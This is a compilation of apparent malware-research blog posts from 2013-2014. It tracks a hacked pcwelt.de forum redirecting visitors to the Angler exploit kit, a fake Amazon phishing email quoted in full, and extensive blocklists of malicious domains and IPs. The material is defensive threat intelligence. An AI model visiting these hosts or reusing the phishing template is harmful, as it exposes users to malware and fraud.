2dw6o2t3o4m3ldqd3urr5rn.charlie-lola.co.uk
o1oynwrwabyoy3lpnullemp.adultvideoz.net
eccb2ple2n3io61ocnlylxj.charlie-lola.co.uk
oz9mfxfthty3nseq5ulhept.charlie-lola.co.uk
vbybi98n6ahxga0hlfknigf.charlie-lola.co.uk
2dw6o2t3o4m3ldqd3urr5rn203453d1ff6245fef81455e5c2f67d6fd.charlie-lola.co.uk
dx8o3le72kyvrnod9pxhypi.clashofclanshackdownload.com
5ajljohtplppqf28mrptv7m.adultvideoz.net
ekneql6voyx9yl3llgpbpji.clashofclanshackdownload.com
xd2n3xrvqyyurerxeo323wp.adultvideoz.net
q9i12z6kq1i9x8bvexbxe9i.check-email.org
eij03t2t97ttyizacnm1qhi.cialis25.pl
ekneql6voyx9yl3llgpbpji207253dd486a9392d86820f01eb1afca5.clashofclanshackdownload.com
s2toz89du52uetctfctw3zj.charlie-lola.co.uk
e1jlzq2t97mtuik7ccm1ehi.clashofclanshackdownload.com
e1jlzq2t97mtuik7ccm1ehi501553d272a175fc69b885025dbad9609.clashofclanshackdownload.com
eearh6ft21f1u3a2e95uy7p.adultvideoz.net
c7hfahqlxxwj5uvvuulhyt7504153d274a615987cc9b10729b1b4d87.clashofclanshackdownload.com
c7hfahqlxxwj5uvvuulhyt7902153d274894606a7d1108c7b58e09a6.clashofclanshackdownload.com
de2v8wu6l0sd3xbvmdtrdm7214653d251032854059ba8f2a19e587fc.clashofclanshackdownload.com
jlx9opd9ge26hk9j4zyiqlp.clashofclanshackdownload.com
jlx9opd9ge26hk9j4zyiqlp503453d2766b46e828c50c75b8ca5a70a.clashofclanshackdownload.com
u2t1x94kcgm78tfitogjmfn.charlie-lola.co.uk

Thursday 12 June 2014

pcwelt.de hacked, serving EK on 91.121.51.237

The forum of popular German IT news site pcwelt.de has been hacked and is sending visitors to the Angler exploit kit.

Visitors to the forum are loading up a compromised script hxxp://www[.]pcwelt[.]de/forum/map/vbulletin_sitemap_forum_13.xml.js which contains some Base64 obfuscated malicious code (see Pastebin here) which uses a date-based DGA (domain generation algorithm) to direct visitors to a URL with the following format:

[7-or-8-digit-hex-string].pw/nbe.html?0.[random-number]

The .pw domain contains Base64 encoded data which points to the payload kit, in this case [donotclick]exburge-deinothe.type2consulting.net:2980/meuu5z7b3w.php (Pastebin) which is hosted on 91.121.51.237 (OVH, France). This appears to be the Angler EK.

It looks like the EK domains rotate regularly, but the following sites can be observed on this address:

ingetrekte.valueoptimizationfrontier.com
shellshellwillbomb.type2consulting.net
voorspannenzl.valueoptimizationfrontier.com
tourmenterai.afiduciaryfirst.com
kingyoku.typetwoconsulting.com
mittelbau.typetwoconsulting.com
yogeespith1.typetwoconsulting.com
rozrzewnienie.typetwoconsulting.com
geschaeftlichen.typetwoconsulting.com
kyhtyy-pimprinum.typetwoconsulting.com
jezuietendriesthe.typetwoconsulting.com
depolitsuperconfusion.typetwoconsulting.com
degivreraitdeorganization.typetwoconsulting.com
sknktekonzile-streelsters.typetwoconsulting.com
shogunalbeschenktet.viverebenealcaldo.com
subigi.valueoptimizationfrontier.com
totalize.valueoptimizationfrontier.com
puyaljoukou.valueoptimizationfrontier.com
weisungsgemaess.valueoptimizationfrontier.com
kezune-palpitera.valueoptimizationfrontier.com
remorquervltimme.valueoptimizationfrontier.com
clackdisfundamellemting.valueoptimizationfrontier.com
doscall.type2consulting.net
pehmoilla.type2consulting.net
moariesubigissem.type2consulting.net
unvigilant-straucht.type2consulting.net
mycetozoanreassesses.type2consulting.net

It is worth noting that these domains appear to have been hijacked from a GoDaddy customer:
type2consulting.net
valueoptimizationfrontier.com
typetwoconsulting.com
afiduciaryfirst.com

The following .pw sites are live right now, hiding behind Cloudflare:
7411447a.pw
31674ec.pw
e4ae59eb.pw
95bded0e.pw

Recommended blocklist:
91.121.51.237
type2consulting.net
valueoptimizationfrontier.com
typetwoconsulting.com
afiduciaryfirst.com
7411447a.pw
31674ec.pw
e4ae59eb.pw
95bded0e.pw
(and if you can block all .pw domains then it is probably worth doing that too)

Thanks to the #MalwareMustDie crew and Steven Burn for help with this analysis.

Sunday 2 March 2014

Malware sites to block 2/3/14

These domains and IPs are all connected with this gang, some of it appears to be involved in malware distribution, fraud or other illegal activities. I recommend that you block these IPs and domains.

Note that some of the IPs listed below are compromised nameservers (marked [ns]) which look like they are insufficiently well locked down. There is a plain list of IPs at the end for copy-and-pasting.

accounting-kent.net
aerostat-adventures.net
aim-darts.net
airnavrace.net
amia.cc
aqu.su
artplat.com
binfile.net
brigadiramoon170.com
ccl.su
clubkindergarten.net
combonicer200.com
ehk.su
flatroom.net
gefesosexwithjimmy.org
iceselinsgrove.com
kartaby.com
keksnownikolle.biz
kirr.cc
lollipollyboobs.org
lostpetutah.net
macdegredo.com
mecheti.com
megemind.com
onetimedns.com
orimylife.net
pcg.su
quarter.su
sandwars.net
sec-one-dns.com
security-apps24.com
securityappsmart.com
security-safedomains.com
security-trust.com
smis.cc
stepnitres.ru
studio-sands.net
unicttaskforce.com
usgunlavs.net
webercountyfairr.net
wildscot-tv.com
world-motorhome.net

12.42.61.221    (AT&T, US)   
19.214.121.54    (Ford Motor Company, US)    [ns]
22.15.199.21    (DOD, US)    [ns]
23.253.75.234    (Rackspace, US)   
31.210.107.33    (Radore Veri Merkezi Hizmetleri, Turkey)   
32.21.129.43    (AT&T, US)    [ns]
32.90.65.25    (AT&T, US)    [ns]
37.255.241.29    (TCE, Iran)   
41.66.55.3    (Cote d'Ivoire Telecom, Cote d'Ivoire)    [ns]
41.106.3.132    (FTTH, Algeria)    [ns]
42.96.195.183    (Alibaba, China)    [ns]
54.81.32.208    (Amazon AWS, US)   
65.27.155.176    (Time Warner Cable, US)   
79.88.112.206    (Societe Francaise du Radiotelephone, France)   
83.239.90.244    (OJSC Rostelecom Macroregional Branch South, Russia)   
89.39.83.177    (C&A Connect SRL, Romania)   
89.69.138.91    (UPC, Poland)   
92.84.13.131    (Romtelecom, Romania)    [ns]
93.190.137.5    (Worldstream, Netherlands)   
95.57.118.56    (Dmitry Davydenko / Goldhost LLC, Kazakhstan)   
96.44.143.179    (Quadranet Inc, US)   
103.31.251.202    (Argon Data Communication, Indonesia)   
108.81.248.139    (William Allard / AT&T, US)   
109.24.255.129    (Societe Francaise du Radiotelephone, France)   
112.222.201.43    (LG DACOM Corporation, Korea)   
115.28.39.216    (Hichina Web Solutions, China)   
128.101.154.25    (University of Minnesota, US)    [ns]
128.199.235.196    (DigitialOcean Cloud, Singapore)   
130.255.185.19    (Bradler & Krantz, Germany)   
147.249.171.10    (IDD Information Services, US)    [ns]
152.46.17.236    (North Carolina Research and Education Network, US)   
162.243.39.118    (Digital Ocean, US)   
167.15.26.219    (Munich Reinsurance America Inc, US)    [ns]
167.120.25.43    (The Dow Chemical Company, US)    [ns]
171.76.101.11    (Bharti Cellular Ltd, India)    [ns]
175.107.192.56    (Cyber Internet Services Pakistan, Pakistan)   
176.53.125.6    (Radore Veri Merkezi Hizmetleri, Turkey)   
181.41.194.253    (HOST1FREE at Brazil, Brazil)   
184.154.170.10    (SingleHop, US)    [ns]
185.9.159.205    (Salay Telekomunikasyon Ticaret Limited Sirketi, Turkey)   
186.194.39.139    (FMG Macabuense com serv distrib ltda-me, Brazil)    [ns]
186.202.184.178    (Locaweb Serviços de Internet S/A, Brazil)   
186.214.212.64    (Global Village Telecom, Brazil)   
188.165.91.216    (OVH, France / DoHost, Egypt)    [ns]
188.168.142.57    (Transtelecom CJSC, Russia)   
193.17.184.247    (Biznes-Host.pl, Poland)   
194.209.82.222    (blue-infinity, Switzerland)    [ns]
203.235.181.138    (KRNIC, Korea)   
208.167.238.115    (Choopa LLC, US)   
209.203.50.200    (Vox Telecom, South Africa)   
222.218.13.91    (Chinanet Guangxi Province Network , China)    [ns]


12.42.61.221
19.214.121.54
22.15.199.21
23.253.75.234
31.210.107.33
32.21.129.43
32.90.65.25
37.255.241.29
41.66.55.3
41.106.3.132
42.96.195.183
54.81.32.208
65.27.155.176
79.88.112.206
83.239.90.244
89.39.83.177
89.69.138.91
92.84.13.131
93.190.137.5
95.57.118.56
96.44.143.179
103.31.251.202
108.81.248.139
109.24.255.129
112.222.201.43
115.28.39.216
128.101.154.25
128.199.235.196
130.255.185.19
147.249.171.10
152.46.17.236
162.243.39.118
167.15.26.219
167.120.25.43
171.76.101.11
175.107.192.56
176.53.125.6
181.41.194.253
184.154.170.10
185.9.159.205
186.194.39.139
186.202.184.178
186.214.212.64
188.165.91.216
188.168.142.57
193.17.184.247
194.209.82.222
203.235.181.138
208.167.238.115
209.203.50.200
222.218.13.91

Thursday 27 February 2014

Amazon.com "Important For Your Online Account Access" spam / 213.152.26.150

This fake Amazon spam leads to something bad.
Date:      Wed, 26 Feb 2014 13:09:55 -0400 [02/26/14 12:09:55 EST]
From:      "Amazon.com" [t1na@msn.com]
Subject:      Important For Your Online Account Access .

Your Account Has Been Held

Dear Customer ,

We take you to note that your account has been suspended for protection , Where the password was entered more than once .

In order to protect ,account has been suspended .Please update your Account Information To verify the account.

http://www.amazon.com/gp/orc/rml/D0bvnTq6RRMA

Thanks for Update at Amazon.com.

-------------------------------------------------------------
Amazon.com
http://www.amazon.com
-------------------------------------------------------------

Please note: This e-mail message was sent from a notification-only address that
cannot accept incoming e-mail. Please do not reply to this message.


In the samples that I have seen the link in the email goes to either [donotclick]exivenca.com/support.php or [donotclick]vicorpseguridad.com/support.php both of which are currently down but were both legitimate sites hosted on 213.152.26.150 (Neo Telecoms, France). The fact that these sites are down could be because the host is dealing with the problem, however I would expect to see this same email template being used again in the future, so take care..

Friday 15 November 2013

Malware sites to block 15/11/2013 (Caphaw)

Thanks to a tip to investigate 199.68.199.178 I discovered that the Caphaw network I looked at yesterday is much bigger than I thought. The following IPs and domains can all be regarded as malicious (.SU domains are normally a dead giveaway for evil activity).

The recommended blocklist is at the end of the post (highlighted). These are the hosts involved either now or recently with hosting these Caphaw domains:

5.175.173.219 (GHOSTnet, Germany)
5.231.66.192 (GHOSTnet, Germany)
23.90.28.12 (ServerHub Dallas, US)
46.4.47.20 (Hetzner, Germany)
46.4.47.21 (Hetzner, Germany)
46.4.47.22 (Hetzner, Germany)
88.198.57.178 (Hetzner, Germany)
88.200.98.137 (Studentski domovi v Ljubljani, Slovenia)
91.186.19.48 (Simply Transit, UK)
92.48.122.132 (Simply Transit, UK)
108.170.54.251 (eWebGuru, India / Secured Servers, US)
109.200.4.114 (Redstation, UK)
109.123.127.228 (UK2, UK)
141.8.225.5 (Rook Media, Switzerland)
151.236.49.136 (Simply Transit, UK)
153.153.19.23 (Open Computer Network, Japan)
181.41.193.168 (Host1plus Brazil, Chile)
184.22.246.31 (Network Operations Center, US)
184.82.62.95 (Network Operations Center, US)
188.227.161.26 (Redstation, UK)
198.52.243.229 (Centarra Networks, US)
199.68.199.178 (Lightwave Networking, US)
213.229.90.199 (Simply Transit, UK)

The following hosts appear to be hosting nameservers for these domains (note that USAISC has been identified doing this before):

1.165.101.158 (Chunghwa Telecom, Taiwan)
6.79.15.154 (USAISC, US)
31.83.89.143 (Orange PCS, UK)
62.75.232.182 (Eurostream, Lithunia / Intergenia AG, Germany)
78.188.5.201 (Turk Telekom, Turkey)
85.25.152.130 (Intergenia AG, Germany)
87.98.136.239 (OVH, France)
91.121.199.45 (OVH, France)
95.143.32.212 (Inline Internet, Germany)
188.138.10.29 (EvroHoster.ru. Ukraine / Intergenia AG, Germany)
188.138.10.30 (EvroHoster.ru. Ukraine / Intergenia AG, Germany)
188.138.78.229 (Eurostream, Lithunia / Intergenia AG, Germany)
188.138.78.232 (Eurostream, Lithunia / Intergenia AG, Germany)
188.138.78.248 (Stepan Alexander Mereuta, Moldova / Intergenia AG, Germany)
196.44.161.31 (Dar Es Salaam University, Tanzania)
198.52.240.8 (Avante Hosting Services, Canada)
217.172.187.9 (Intergenia AG, Germany)

These are the domains involved (I would strongly recommend blocking them):

afn.cc
akf.cc
alphard-info.net
astats.su
bai.su
blinking-imgs.su
caf.su
careservice.su
ciz.cc
collectserv.su
digital-in-one.cc
dig-services.at
dmf.su
eewuiwiu.cc
eguards.cc
enp.cc
e-statistics.su
estatus.cc
estatus.su
eux.cc
exy.su
fey.su
fooyuo.cc
frnm.su
g4-maxservice.su
giuchito.cc
guodeira.cc
gva.cc
higuards.su
ieguards.cc
iestat.cc
imgscores.cc
inetprotections.cc
infoenv.cc
invisibleski.com
iostat.su
istat.cc
iwebstats.cc
iwebstats.su
klr.su
lbb.su
lbp.cc
lil-web-svcs.su
limited-hsbc.com
llc-services.su
low-rates.su
lrnm.su
main2woo.su
nitecapvideo.net
nmbc.cc
nomorefees.cc
ognelisblog.net
online-verification.su
oprn.su
ormu.su
peguards.cc
pmr.cc
protected-onlinebanking.net
sj148-storage.net
standartextens.net
stat-service.net
sys-img-stores.cc
sysinfo.su
uceebeel.cc
up-stores.cc
veeceefi.cc
visite-mexico.net
webstats.su
wgate.su
wgate.su
wownthing.cc
wsysinfonet.su
zprn.su


Recommend IP blocklist (nameservers are in italics):

5.175.173.219
5.231.66.192
23.90.28.12
46.4.47.0/27
88.198.57.178
88.200.98.137
91.186.19.48
92.48.122.132
108.170.54.251
109.200.4.114
109.123.127.228
141.8.225.5
151.236.49.136
153.153.19.23
181.41.193.168
184.22.246.31
184.82.62.95
188.227.161.26
198.52.243.229
199.68.199.178
213.229.90.199

1.165.101.158
6.79.15.154
31.83.89.143
62.75.232.182
78.188.5.201
85.25.152.130
87.98.136.239
91.121.199.45
95.143.32.212
188.138.10.29
188.138.10.30
188.138.78.229
188.138.78.232
188.138.78.248
196.44.161.31
198.52.240.8
217.172.187.9